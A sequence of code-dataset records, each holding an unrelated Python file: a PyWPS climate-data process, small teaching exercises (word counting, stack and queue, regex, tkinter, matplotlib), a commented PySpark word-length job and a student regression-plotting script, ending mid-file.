ComplexInput, ComplexOutput, Format, LiteralInput, LiteralOutput, Process\nfrom pywps.inout.literaltypes import make_allowedvalues\nfrom pywps.app.Common import Metadata\nfrom pywps.response.status import WPS_STATUS\n\nfrom copernicus import runner, util\nfrom copernicus.processes.utils import default_outputs, model_experiment_ensemble\n\nLOGGER = logging.getLogger(\"PYWPS\")\n\n\nclass PreprocessExample(Process):\n def __init__(self):\n inputs = [\n *model_experiment_ensemble(\n models=['EC-EARTH'],\n model_name='model1',\n experiments=['historical'],\n ensembles=['r2i1p1'],\n ensemble_name='ensemble1',\n start_end_year=(1850, 2005),\n start_end_defaults=(2000, 2005)\n ),\n *model_experiment_ensemble(\n models=['bcc-csm1-1'],\n model_name='model2',\n experiments=['historical'],\n ensembles=['r1i1p1'],\n ensemble_name='ensemble2',\n start_end_year=(1850, 2005),\n start_end_defaults=(2000, 2005)\n ),\n *model_experiment_ensemble(\n models=['MPI-ESM-LR'],\n model_name='model3',\n experiments=['historical'],\n ensembles=['r1i1p1'],\n ensemble_name='ensemble3',\n start_end_year=(1850, 2005),\n start_end_defaults=(2000, 2005)\n ),\n LiteralInput('extract_levels', 'Extraction levels',\n abstract='Choose an extraction level for the preprocessor.',\n data_type='float',\n #allowed_values=make_allowedvalues([0.0, 110000.0]),\n default=85000.0),\n ]\n outputs = [\n ComplexOutput('plot', 'Output plot',\n abstract='Generated output plot of ESMValTool processing.',\n as_reference=True,\n supported_formats=[Format('image/png')]),\n ComplexOutput('data', 'Data',\n abstract='Generated output data of ESMValTool processing.',\n as_reference=True,\n supported_formats=[FORMATS.NETCDF]),\n ComplexOutput('archive', 'Archive',\n abstract='The complete output of the ESMValTool processing as an zip archive.',\n as_reference=True,\n supported_formats=[Format('application/zip')]),\n *default_outputs(),\n ]\n\n super(PreprocessExample, self).__init__(\n self._handler,\n identifier=\"preproc\",\n title=\"Preprocessing Demo\",\n version=runner.VERSION,\n abstract=\"Generates a plot for temperature using ESMValTool.\",\n# \" The default run uses the following CMIP5 data:\"\n# \" project=CMIP5, experiment=historical, ensemble=r1i1p1, variable=ta, model=MPI-ESM-LR, time_frequency=mon.\", # noqa\n metadata=[\n Metadata('Estimated Calculation Time', '1 Minute'),\n Metadata('ESMValTool', 'http://www.esmvaltool.org/'),\n# Metadata('Documentation',\n# 'https://copernicus-wps-demo.readthedocs.io/en/latest/processes.html#pydemo',\n# role=util.WPS_ROLE_DOC),\n# Metadata('Media',\n# util.diagdata_url() + '/pydemo/pydemo_thumbnail.png',\n# role=util.WPS_ROLE_MEDIA)\n ],\n inputs=inputs,\n outputs=outputs,\n status_supported=True,\n store_supported=True)\n\n def _handler(self, request, response):\n response.update_status(\"starting ...\", 0)\n workdir = self.workdir\n\n # build esgf search constraints\n constraints = dict(\n model1=request.inputs['model1'][0].data,\n ensemble1=request.inputs['ensemble1'][0].data,\n model2=request.inputs['model2'][0].data,\n ensemble2=request.inputs['ensemble2'][0].data,\n model3=request.inputs['model3'][0].data,\n ensemble3=request.inputs['ensemble3'][0].data,\n experiment=request.inputs['experiment'][0].data,\n )\n\n options = dict(\n extract_levels=request.inputs['extract_levels'][0].data\n )\n\n # generate recipe\n response.update_status(\"generate recipe ...\", 10)\n recipe_file, config_file = runner.generate_recipe(\n workdir=workdir,\n diag='preproc',\n constraints=constraints,\n start_year=request.inputs['start_year'][0].data,\n end_year=request.inputs['end_year'][0].data,\n output_format='png',\n options=options\n )\n\n # recipe output\n response.outputs['recipe'].output_format = FORMATS.TEXT\n response.outputs['recipe'].file = recipe_file\n\n # run diag\n response.update_status(\"running diagnostic ...\", 20)\n result = runner.run(recipe_file, config_file)\n\n response.outputs['success'].data = result['success']\n\n # log output\n response.outputs['log'].output_format = FORMATS.TEXT\n response.outputs['log'].file = result['logfile']\n\n # debug log output\n response.outputs['debug_log'].output_format = FORMATS.TEXT\n response.outputs['debug_log'].file = result['debug_logfile']\n\n if result['success']:\n try:\n self.get_outputs(result, response)\n except Exception as e:\n response.update_status(\"exception occured: \" + str(e), 85)\n else:\n LOGGER.exception('esmvaltool failed!')\n response.update_status(\"exception occured: \" + result['exception'], 85)\n\n response.update_status(\"creating archive of diagnostic result ...\", 90)\n\n response.outputs['archive'].output_format = Format('application/zip')\n response.outputs['archive'].file = runner.compress_output(os.path.join(workdir, 'output'), 'diagnostic_result.zip')\n\n response.update_status(\"done.\", 100)\n return response\n\n def get_outputs(self, result, response):\n # result plot\n response.update_status(\"collecting output ...\", 80)\n response.outputs['plot'].output_format = Format('application/png')\n response.outputs['plot'].file = runner.get_output(\n result['plot_dir'],\n path_filter=os.path.join('diagnostic1', 'script1'),\n name_filter=\"CMIP5*\",\n output_format=\"png\")\n\n response.outputs['data'].output_format = FORMATS.NETCDF\n response.outputs['data'].file = runner.get_output(\n result['plot_dir'],\n path_filter=os.path.join('diagnostic1', 'script1'),\n name_filter=\"CMIP5*\",\n output_format=\"nc\")\n","sub_path":"copernicus/processes/wps_preproc_example.py","file_name":"wps_preproc_example.py","file_ext":"py","file_size_in_byte":7012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"269379640","text":"import re\nfrom collections import Counter\n\n\ndef load_data(filepath):\n with open(filepath, 'r') as data:\n return data.read()\n\n\ndef get_most_frequent_words(text, number_of_words_to_output):\n words = get_all_words(text)\n counter_words = Counter(words)\n list_of_common_words = \\\n counter_words.most_common(number_of_words_to_output)\n return list_of_common_words\n\n\ndef get_all_words(text):\n words = re.findall(r'[^\\W|\\d]+', text)\n return words\n\n\nif __name__ == '__main__':\n number_of_output_words = 10\n filepath = input('Name of the file:')\n text_from_file = load_data(filepath)\n text_from_file.lower()\n list_of_common_words = get_most_frequent_words(text_from_file, \\\n number_of_output_words)\n print('{} {}'.format(str(number_of_output_words), \\\n 'of the most common words: '))\n for word in list_of_common_words:\n print(word)","sub_path":"lang_frequency.py","file_name":"lang_frequency.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"83174363","text":"primeiro = int(input('Digite o primeiro termo: '))\r\nrazao = int(input('Razão da PA: '))\r\ntermo = primeiro\r\nc = 1\r\nwhile c <= 10:\r\n print(f'{termo} - ', end='')\r\n termo += razao\r\n c += 1\r\nprint('Fim')\r\n\r\n","sub_path":"ex061 - Progressão aritimetica v2.0.py","file_name":"ex061 - Progressão aritimetica v2.0.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"186588271","text":"# -*- coding: utf-8 -*-\n'''Base Class of PlotCanvas'''\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nfrom PyQt5.QtWidgets import QSizePolicy\n\n\nclass PlotCanvas(FigureCanvas):\n '''FigureCanvas Class'''\n\n def __init__(self, parent=None, width=4.8, height=3, dpi=200):\n\n self.fig = Figure(figsize=(width, height), dpi=dpi)\n self.fig.subplots_adjust(left=0.2, right=0.95, bottom=0.16, top=0.95)\n self.plot_canvas = self.fig.add_subplot(111)\n\n FigureCanvas.__init__(self, self.fig)\n self.setParent(parent)\n\n FigureCanvas.setSizePolicy(self,\n QSizePolicy.Expanding,\n QSizePolicy.Expanding)\n FigureCanvas.updateGeometry(self)\n\n #Turn main and sub ticks inward\n self.plot_canvas.tick_params(\n which=\"major\", direction='in', labelleft=False)\n self.plot_canvas.tick_params(\n which=\"minor\", direction='in', labelleft=False)\n","sub_path":"base_func/base_plot.py","file_name":"base_plot.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"303968267","text":"# --------------------------------------------------------\n#\n# PYTHON PROGRAM DEFINITION\n#\n# The knowledge a computer has of Python can be specified in 3 levels:\n# (1) Prelude knowledge --> The computer has it by default.\n# (2) Borrowed knowledge --> The computer gets this knowledge from 3rd party libraries defined by others\n# (but imported by us in this program).\n# (3) Generated knowledge --> The computer gets this knowledge from the new functions defined by us in this program.\n#\n# When launching in a terminal the command:\n# user:~$ python3 this_file.py\n# our computer first processes this PYTHON PROGRAM DEFINITION section of the file.\n# On it, our computer enhances its Python knowledge from levels (2) and (3) with the imports and new functions\n# defined in the program. However, it still does not execute anything.\n#\n# --------------------------------------------------------\n\n# ------------------------------------------\n# IMPORTS\n# ------------------------------------------\nimport pyspark\nimport shutil\nimport os\n\n# ------------------------------------------\n# FUNCTION process_line\n# ------------------------------------------\ndef process_line(line):\n # 1. We create the output variable\n res = []\n\n # 2. We set the line to be split by \" \"\n line = line.replace(\"\\n\", \"\")\n line = line.strip()\n line = line.rstrip()\n line = line.replace(\"\\t\", \" \")\n\n # 3. We get rid of chars not being either a letter or a \" \"\n index = len(line) - 1\n\n # 3.1. We traverse all characters\n while (index >= 0):\n # 3.1.1. We get the ord of the character at position index\n char_val = ord(line[index])\n\n # 3.1.2. If (1) char_val is not \" \" and (2) char_val is not an Upper Case letter and (3) char_val is not a Lower Case letter\n if ( ( char_val != 32) and ((char_val < 65) or (char_val > 90)) and ((char_val < 97) or (char_val > 122)) ):\n # 3.1.2.1. We remove the index from the sentence\n line = line[:index] + line[(index+1):]\n # 3.1.3. If the character was an upper case letter\n elif ((char_val >= 65) and (char_val <= 90)):\n # 3.1.3.1. We add it as lower case\n line = line[:index] + chr(char_val + 32) + line[(index + 1):]\n\n # 3.1.4. We continue with the next index\n index = index - 1\n\n # 4. We get the list of words\n res = line.split(\" \")\n\n index = len(res) - 1\n\n # 4.1. We traverse the words\n while (index >= 0):\n # 4.1.1. If it is empty, we remove it\n if (res[index] == ''):\n del res[index]\n\n # 4.1.2. We continue with the next word\n index = index - 1\n\n # 5. We return res\n return res\n\n# ------------------------------------------\n# FUNCTION my_main\n# ------------------------------------------\ndef my_main(sc, my_dataset_dir, my_result_dir):\n # 1. Operation C1: Creation 'textFile', so as to store the content of the dataset contained in the folder dataset_dir into an RDD.\n # If the dataset is big enough, its content is to be distributed among multiples nodes of the cluster.\n # The operation reads the files of the folder line by line. Thus, each item of the RDD is going to be a String (the content of the line being read).\n\n # C1: textFile\n # dataset -------------> inputRDD --- RDD items are String ---\n\n inputRDD = sc.textFile(my_dataset_dir)\n\n # 2. Operation T1: Transformation 'flatMap', so as to get a new RDD ('allWordsRDD') with all the words of inputRDD.\n\n # We apply now a lambda expression as F to bypass each item of the collection to our actual filtering function F2 requiring more than\n # one argument. The function F2 is process_line, which cleans the lines from all bad_chars and splits it into a list of words.\n # We apply flatMap instead of map as we are not interested in the words of each line, just the words in general.\n # Thus, map would have given us an RDD where each item had been a list of words, the list of words on each line (i.e., each item had been [String]).\n # On the other hand, flatMap allows us to flat the lists and get instead an RDD where each item is a String, a word of the dataset.\n\n # C1: textFile\n # dataset -------------> inputRDD --- RDD items are String ---\n # |\n # | T1: flatMap\n # |------------> all_wordsRDD --- RDD items are String ---\n\n allWordsRDD = inputRDD.flatMap(process_line)\n\n # 3. Operation T2: Transformation 'map', so as to get a new RDD ('pairWordsRDD') with a pair (letter, length of word) per word of the dataset.\n\n # Having the entire word for each word of the dataset is useless for us. Indeed, what we are interested into is just:\n # - The first letter (as we are outputting the average length per letter of the alphabet in the solution later on).\n # - The length of the word itself (as it is useful to us to compute such this average size).\n # Also, moving from an RDD it single String items into one of pairs (key, value) with key the letter and value the length of the word seems to be\n # a step in the right direction, as later one we can manipulate this (key, value) pairs with some of the pair RDD transformations and actions.\n\n # C1: textFile\n # dataset -------------> inputRDD --- RDD items are String ---\n # |\n # | T1: flatMap\n # |------------> allWordsRDD --- RDD items are String ---\n # |\n # | T2: map\n # | ---------> pairWordsRDD --- RDD items are (char, int) ---\n\n pairWordsRDD = allWordsRDD.map( lambda x: (x[0], len(x)) )\n\n # 4. Operation T3: Transformation 'combineByKey', so as to get a new RDD ('letterTotalInfo') with a pair (letter, (num_letters, num_words)) per\n # letter of the alphabet.\n\n # The transformation operation 'combineByKey' requires as arguments 3 functions:\n\n # F1: To be applied in parallel to each node of the cluster.\n # The function is responsible of answering this question:\n # How do you want Spark to process the first (key, value) pair for each key k ?\n\n # If a node contains 1000 entries (key, value) with key 'k', F1 will only be applied once, for the first (key, value) found.\n # F1 must receive as input 1 parameter: The value of the (key, value) pair.\n # F1 must produce as an output 1 parameter: The accumulator accum generated for the pair (key, accum), created after\n # processing the first (key, value).\n\n # F2: To be applied in parallel to each node of the cluster.\n # The function is responsible of answering this question:\n # How do you want Spark to process all (key, value) pairs for each key k after having processed the first one and have got an accumulator ?\n\n # If a node contains 1000 entries (key, value) with key 'k', F2 will be applied 999 times, for all except the first (key, value) found.\n # F2 must receive as input 2 parameters:\n # - The accumulor generated until now.\n # - The value of the new (key, value) pair being found.\n # F2 must produce as an output 1 parameter: The updated accumulator, after aggregating it with the new (key, value) being found.\n\n # F3: To be applied as a whole single process through all nodes of the cluster.\n # The function is responsible of answering this question:\n # How do you want Spark to process all (key, accumulator) pairs so as to get a whole single (key, accumulator) pair ?\n\n # If combineByKey is applied to n nodes, F3 will be applied n-1 times, to merge all accumulators under a single accumulator.\n # F3 must receive as input 2 parameters:\n # - The meta-accumulor generated until now.\n # - The accumulator generated by node i, being processed now.\n # F3 must produce as an output 1 parameter: The updated accumulator, after aggregating it with the new (key, accumulator) being found.\n\n # C1: textFile\n # dataset -------------> inputRDD --- RDD items are String ---\n # |\n # | T1: flatMap\n # |------------> allWordsRDD --- RDD items are String ---\n # |\n # | T2: map\n # | ---------> pairWordsRDD --- RDD items are (char, int) ---\n # |\n # | T3: combineByKey\n # |-------------------> letterTotalInfoRDD --- RDD items are (char, (int, int))\n\n letterTotalInfoRDD = pairWordsRDD.combineByKey(lambda x: (x, 1),\n lambda x, y: (x[0] + y, x[1] + 1),\n lambda x, y: (x[0] + y[0], x[1] + y[1])\n )\n\n # 5. Operation T4: Transformation 'mapValues', so as to get the average for letter in a new RDD ('solutionRDD').\n\n # We are nearly there. combineByKey has given us pretty much the results we needed. All it is left is to pass from the current accumulator per key\n # (letter, (num_letters, num_words)) to a new simple accumulator (letter, num_letters / num_words).\n # As we are not going to modify the key of each (key, value) pair, we apply the function mapValues instead of map.\n\n # C1: textFile\n # dataset -------------> inputRDD --- RDD items are String ---\n # |\n # | T1: flatMap\n # |------------> allWordsRDD --- RDD items are String ---\n # |\n # | T2: map\n # | ---------> pairWordsRDD --- RDD items are (char, int) ---\n # |\n # | T3: combineByKey\n # |-------------------> letterTotalInfoRDD --- RDD items are (char, (int, int))\n # |\n # | T4: mapValues\n # |----------------> solutionRDD --- RDD items are (char, float) ---\n\n solutionRDD = letterTotalInfoRDD.mapValues(lambda value: (value[0] * 1.0) / (value[1] * 1.0))\n\n # 6. Operation A1: Store the RDD solutionRDD into the desired folder from the DBFS.\n # Each node containing part of solutionRDD will produce a file part-XXXXX with such this RDD subcontent, where XXXXX is the name of the node.\n # Besides that, if the writing operation is successful, a file with name _SUCCESS will be created as well.\n\n # C1: textFile\n # dataset -------------> inputRDD --- RDD items are String ---\n # |\n # | T1: flatMap\n # |------------> allWordsRDD --- RDD items are String ---\n # |\n # | T2: map\n # | ---------> pairWordsRDD --- RDD items are (char, int) ---\n # |\n # | T3: combineByKey\n # |-------------------> letterTotalInfoRDD --- RDD items are (char, (int, int))\n # |\n # | T4: mapValues\n # |----------------> solutionRDD --- RDD items are (char, float) ---\n # |\n # | A1: saveAsTextFile\n # |--------------------> DBFS New Folder\n\n solutionRDD.saveAsTextFile(my_result_dir)\n\n # Extra: To debug the program execution, you might want to this three lines of code.\n # Each of them apply the action 'take', taking a few elements of each RDD being computed so as to display them by the screen.\n\n # resVAl = solutionRDD.take(10)\n # for item in resVAl:\n # print(item)\n\n\n# --------------------------------------------------------\n#\n# PYTHON PROGRAM EXECUTION\n#\n# Once our computer has finished processing the PYTHON PROGRAM DEFINITION section its knowledge is set.\n# Now its time to apply this knowledge.\n#\n# When launching in a terminal the command:\n# user:~$ python3 this_file.py\n# our computer finally processes this PYTHON PROGRAM EXECUTION section, which:\n# (i) Specifies the function F to be executed.\n# (ii) Define any input parameter such this function F has to be called with.\n#\n# --------------------------------------------------------\nif __name__ == '__main__':\n # 1. We use as many input arguments as needed\n pass\n\n # 2. Local or Databricks\n local_False_databricks_True = True\n\n # 3. We set the path to my_dataset and my_result\n my_local_path = \"../../../\"\n my_databricks_path = \"/\"\n\n my_dataset_dir = \"FileStore/tables/1_Spark_Core/my_dataset/\"\n my_result_dir = \"FileStore/tables/1_Spark_Core/my_result\"\n\n if local_False_databricks_True == False:\n my_dataset_dir = my_local_path + my_dataset_dir\n my_result_dir = my_local_path + my_result_dir\n else:\n my_dataset_dir = my_databricks_path + my_dataset_dir\n my_result_dir = my_databricks_path + my_result_dir\n\n # 4. We remove my_result directory\n if local_False_databricks_True == False:\n if os.path.exists(my_result_dir):\n shutil.rmtree(my_result_dir)\n else:\n dbutils.fs.rm(my_result_dir, True)\n\n # 5. We configure the Spark Context\n sc = pyspark.SparkContext.getOrCreate()\n sc.setLogLevel('WARN')\n print(\"\\n\\n\\n\")\n\n # 6. We call to our main function\n my_main(sc, my_dataset_dir, my_result_dir)\n","sub_path":"Big_Data/L15-25_Spark_Environment/Workspace/1_Spark_Core/6_Text_File_Examples/p25_average_length_of_words.py","file_name":"p25_average_length_of_words.py","file_ext":"py","file_size_in_byte":14595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"304573461","text":"#!/usr/bin/env python3\n\"\"\"\nA harmadik...\n\nA 2nd_window1.py alapján készül. Egy 4x4-es grid létrehozása a feladvány,\nnémi dekorációval, a rács elemei Button ojjektumok.\nA grid() sticky paramétere adja meg, hogy melyik oldalon ragadjon a cella oldala,\nha változik a cellát tartalmazó widget mérete. (N=North, S=South, W=West, E=East -\namennyiben két szemben lévő oldalt egyszerre állítok be, akkor abban az irányban\na konténer méretének változásakor a widget mérete is változik, NS esetében a függőleges,\nWE esetében a vízszintes, NSWE esetében minden irányban)\n\"\"\"\n\n\nimport tkinter as tk\n\n\nclass MyApplication(tk.Frame):\n\n def __init__(self, root_window):\n super().__init__(root_window)\n self.run_flag = False\n\n def add_cells(self):\n if self.run_flag:\n return\n self.run_flag = True\n for i in range(0, 4):\n for j in range(0, 4):\n self.columnconfigure(i, weight=1)\n self.rowconfigure(j, weight=1)\n widget = tk.Button(self, text=\"{}x{}\".format(i,j))\n widget.grid(column=i, row=j, sticky=\"WE\", padx=4, pady=4)\n\n\ndef app_start():\n root = tk.Tk()\n root.geometry(\"800x600\")\n app_object = MyApplication(root)\n app_object.config(relief=tk.GROOVE, bd=3, background=\"#AAAAFF\")\n app_object.pack(padx=5, pady=5, ipadx=5, ipady=5, expand=tk.Y, fill=tk.BOTH)\n app_object.add_cells()\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n app_start()\n","sub_path":"3rd_cells.py","file_name":"3rd_cells.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"141256986","text":"class queue:\n\thead = 0\n\ttail = 0\n\tdef __init__(self,n):\n\t\tself.queue = [None]*n\n\tdef enqueue(self,x):\n\t\tself.queue[self.tail]=x\n\t\tif self.tail == len(self.queue)-1:\n\t\t\tself.tail = 0\n\t\telse:\n\t\t\tself.tail +=1\n\tdef dequeue(self):\n\t\tx = self.queue[self.head]\n\t\tif self.head == len(self.queue)-1:\n\t\t\tself.head = 0\n\t\telse:\n\t\t\tself.head +=1\n\t\treturn x\n\n\nclass stack:\n\ttop = 0\n\tdef __init__(self,n):\n\t\tself.stack = [None]*n\n\t\tself.n = n\n\n\tdef stack_empty(self):\n\t\tif self.top == 0:\n\t\t\treturn True\n\t\telse:\n\t\t\tFalse\n\tdef pop(self):\n\t\tif self.stack_empty():\n\t\t\treturn 'underflow'\n\t\telse:\n\t\t\tself.top-=1\n\t\t\treturn self.stack[self.top]\n\tdef push(self,x):\n\t\tif self.top == self.n:\n\t\t\treturn 'overflow'\n\t\telse:\n\t\t\tself.stack[self.top] = x\n\t\t\tself.top+=1\n","sub_path":"datastructures/StackandQueueClass.py","file_name":"StackandQueueClass.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"204092183","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 22 11:18:39 2018\n\n@author: Ayushi\n\"\"\"\n\nimport re\n\n\n\n# re.compile converts regex pattern to variable,\n# and makes it easier to reuse\nregex = re.compile(r'[+-]?\\d*[\\.][\\d]+')\n\nlst = []\n## Search \nwhile True:\n string1 = input()\n if not string1:\n break\n\n# Gets the string from where the match is found\n response = regex.search(string1)\n if response:\n lst.append(True)\n # The groups contain the matched values.\n # It always returns the fully matched string\n #print(\"True\")\n else:\n lst.append(False)\n #print (\"False\")\n \n \nfor i in lst:\n print(i)","sub_path":"day9/float number.py","file_name":"float number.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"318222122","text":"#!/usr/bin/env python\n\nimport assignment1 as a1\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n(countries, features, values) = a1.load_unicef_data()\n\ntargets = values[:,1]\nx = values[:,7:]\n\n\n#x = a1.normalize_data(x)\n\nN_TRAIN = 100;\n# Select a single feature for training both training inputs and training targets\nx_train = x[0:N_TRAIN,10]\nt_train = targets[0:N_TRAIN]\n\n#Selecting a feature for test both test inputs and test targets\n\nx_test=x[N_TRAIN:,10]\nt_test=targets[N_TRAIN:]\n\n## --- For debugging diagnostics, feel free to comment out\n#print(\"Value of x: \",x)\n#print(\"x_train vector \",x_train)\n#print(\"t_train vector \",t_train)\n#x_train2=x[0:N_TRAIN,0]\n#print(\"value of values[0:N_TRAIN,0]\",x_train2)\n\n#### Begin code to display bar plot\n\nnumber_of_input_features=8\n\n## List to store our input features for training\nfeature_list_input_train=[]\nfor i in range(number_of_input_features):\n #print(\"Value of i: \",i)\n #print(\"Value at x[0:N_TRAIN,\",i,\" ] \",x[0:N_TRAIN,i])\n feature_list_input_train.append(x[0:N_TRAIN,i])\n\n## List to store our test inputs for test validation\nfeature_list_target_test=[]\nfor i in range(number_of_input_features):\n feature_list_target_test.append(x[N_TRAIN:,i])\n\nprint(\"---Printing element list from feature list---\")\n\nprint(\"Target dimensions: \",t_train.shape[0],t_train.shape[1])\nlenArg=len(feature_list_input_train)\n\n# List to store the following as elements (weights,trainingerror)\nwerr=[]\nfor i in range(lenArg):\n (w,tr_err)=a1.linear_regression(feature_list_input_train[i],t_train,\"polynomial\",0,3)\n tup=(w,tr_err)\n werr.append(tup)\n #print(feature_list[i].shape[0])\n #print(feature_list[i].shape[1])\n\n#for j in range(len(werr)):\n #print(werr[j][0])\n\n\n### List to store the following as elements (estimates, te_err)\nlstZ=[]\nfor i in range(lenArg):\n (t_est,te_err)=a1.evaluate_regression(feature_list_target_test[i],t_test,werr[i][0],\"polynomial\",3)\n tup2=(t_est,te_err)\n lstZ.append(tup2)\n\n## Note: technically we do not need these list variables but we put them there for code readability\ntraining_error_list=[]\ntest_error_list=[]\nfor i in range(lenArg):\n #print(\"training error, test error: \",werr[i][1],lstZ[i][1])\n training_error_list.append(werr[i][1])\n test_error_list.append(lstZ[i][1])\n\n### To do on above: refactor when have time\n\n\"\"\" Code for barplot comment out to see barplot\"\"\"\n\nn_features=8\nfig,ax=plt.subplots()\nindex=np.arange(n_features)\nbar_width=0.35\nopacity=0.8\n\nrects1=plt.bar(index,training_error_list,bar_width,alpha=opacity,color='b',label='training error')\nrects2=plt.bar(index+bar_width,test_error_list,bar_width,alpha=opacity,color='g',label='test error')\n\nplt.xlabel('Feature')\nplt.ylabel('Error')\nplt.title('Errors for each feature')\nplt.xticks(index+bar_width,('8f1','9f2','10f3','11f4','12f5','13f6','14f7','15f8'),rotation=170)\nplt.legend()\n\nplt.tight_layout()\nplt.show()\n\n\n\n\n#print(\"Value of min(x_train): \")\n#print(min(x_train))\n#print(\"Value of max(x_train): \")\n#print(max(x_train))\n\n####\n\n\n\n# Plot a curve showing learned function.\n# Use linspace to get a set of samples on which to evaluate\n\n### Begin code to plot actual polynomial\nx_ev = np.linspace(np.asscalar(min(x_train)), np.asscalar(max(x_train)), num=500)\n#x_ev_col=x_ev[:np.newaxis]\nx_ev_col=x_ev.reshape((500,1))\ny_dummy=np.ones((x.shape[0],1))\n\n\n#print(\"x_ev\",x_ev)\n#for i in range(3):\n\n\n\n#weight_list=[]\n#for i in range(3,6):\n #(w,tr_err)=a1.linear\n\n## List to store our list of features\nf_list=[]\nfor i in range(3,6):\n f_list.append(x[0:N_TRAIN,i])\n\n### List to store our interval of x coordinates\n\n\n\nco_ords=[]\n#min=min(x[0:N_TRAIN,3])\n\n#print(min)\nfor i in range(3,6):\n #print(\"i\",i)\n min=np.amin(x[0:N_TRAIN,i])\n max=np.amax(x[0:N_TRAIN,i])\n #print(min)\n #print(max)\n #print(\"i: \",i)\n #print(x[0:N_TRAIN,i])\n #print(min)\n #print(max)\n\n x_ev=np.linspace(np.asscalar(min),np.asscalar(max),num=500)\n #print(x_ev)\n #x_ev_col=x_ev[:np.newaxis]\n x_ev_col=x_ev.reshape((500,1))\n co_ords.append(x_ev_col)\n\n\n\n## List to store our test inputs for testing | and later plotting\nf_lst_input=[]\nfor i in range(3,6):\n f_lst_input.append(x[N_TRAIN:,i])\n\n##List to store our test targets for testing | and later plotting\n\n\n# List to store the following as elements (weights,trainingerror)\n\nweighterror=[]\nlength=len(f_list)\n\nfor i in range(length):\n #print(\"Inside weight error loop: \")\n #print(f_list[i])\n (weights,trainingerror)=a1.linear_regression(f_list[i],t_train,\"polynomial\",0,3)\n tup=(weights,trainingerror)\n weighterror.append(tup)\n\n#print(\"weighterror[0]\",weighterror[0])\n#r=weighterror[0][0].dot(x_ev)\n#for i in range(len(weighterror)):\n #print(\"Weight set: \")\n #print(weighterror[i][0])\n#List to store the following as elements (estimates, te_err)\n\n#estlist=[]\n#for i in range(length):\n #(estimates,te_err)=a1.evaluate_regression(feature_list_target_test[i],t_test,weighterror[i][0],\"polynomial\",3)\n #tup=(estimates,te_err)\n #estlist.append(tup)\n\ntrain_error=[]\ntest_error=[]\n\nfor i in range(length):\n train_error.append(weighterror[i][1])\n #test_error.append(estlist[i][1])\n\n## Create a y_dummy vectors full of ones to compute y estimates for each feature \n\nfor i in range(length):\n print(\"Value of i in weighterror loop:\",i)\n print(weighterror[i][0])\n\ny_dummy_vec=[]\nfor i in range(3):\n y_dummy=np.ones((co_ords[i].shape[0],1))\n y_dummy_vec.append(y_dummy)\n\n### Evaluate regression on plotting points using previously computed weights\n\n#y_ev_vec=[]\n#for j in range(3):\n #print(\"Value of j: \",j)\n #print(co_ords[i].shape[0])\n #print(y_dummy_vec[i].shape[0])\n #print(weighterror[i][0])\n #print(\"Value of j: \",j)\n #print(co_ords[j])\n\n #for k in range(co_ords[j].shape[0]):\n #print(co_ords[j][k])\n #y_ev,_=a1.evaluate_regression(co_ords[i],y_dummy_vec[i],weighterror[i][0],\"polynomial\",3)\n #y_ev_vec.append(y_ev)\n\nreversecoeffs=[]\nfor j in range(3):\n coeffs=np.flip(weighterror[i][0],0)\n reversecoeffs.append(coeffs)\n\n#print(reversecoeffs[0])\ny_ev_vec=[]\nfor k in range(3):\n #y_ev=np.polyval(reversecoeffs[k],co_ords[k])\n print(co_ords[k].shape[0])\n \n y_ev=a1.evaluate_regression(co_ords[k],None,weighterror[k][0],\"polynomial\",3)\n y_ev_vec.append(y_ev)\n\n#print(type(y_ev_vec[0]))\n\n#print(\"The contents of x_ev are: \")\n#print(x_ev)\n# TO DO:: Put your regression estimate here in place of x_ev.\n# Evaluate regression on the linspace samples.\n# y_ev, _ = a1.evaluate_regression()\n\n#print(len(y_ev_vec[0]))\n\nfor i in range(3):\n print(i)\n\n\nplt.figure(200)\nprint(co_ords[0].shape[0])\nprint(co_ords[0].shape[1])\nprint(\"y_ev_vec[0][0]\",y_ev_vec[0][0])\nprint(\"y_ev_vec[0][0].shape[0]\",y_ev_vec[0][0].shape[0])\n#print(y_ev_vec[0])\n\nplt.title(\"Plot of learned polynomial against datapoints\")\nplt.plot(co_ords[0],y_ev_vec[0][0],'r.-')\nplt.plot(f_list[0],t_train,'bo')\nplt.plot(f_lst_input[0],t_test,'go')\nplt.show()\n\nplt.figure(300)\nplt.title(\"Plot of learned polynomial against datapoints\")\nplt.plot(co_ords[1],y_ev_vec[1][0],'r.-')\nplt.plot(f_list[1],t_train,'bo')\nplt.plot(f_lst_input[1],t_test,'go')\nplt.show()\n\nplt.figure(400)\nplt.title(\"Plot of learned polynomial against datapoints\")\n#plt.legend(\"Function\",\"Points\")\nplt.plot(co_ords[2],y_ev_vec[2][0],'r-')\nplt.plot(f_list[2],t_train,'bo')\nplt.plot(f_lst_input[2],t_test,'go')\nplt.show()\n\n\n\"\"\"\n\nplt.plot(x_ev,y_ev,'r.-')\nplt.plot(x_train,t_train,'bo')\nplt.title('A visualization of a regression estimate using random outputs')\nplt.show()\n\n\"\"\"\n\n\n\n","sub_path":"Assignment1/code/visualize_1d.py","file_name":"visualize_1d.py","file_ext":"py","file_size_in_byte":7550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"126706502","text":"\"\"\" Utility function for vizex \"\"\"\n\nfrom math import ceil\nfrom colored import fg, attr, stylize\n\ndef bytes_to_human_readable(bytes: int, suffix='B') -> str:\n \"\"\"\n Converts bytes 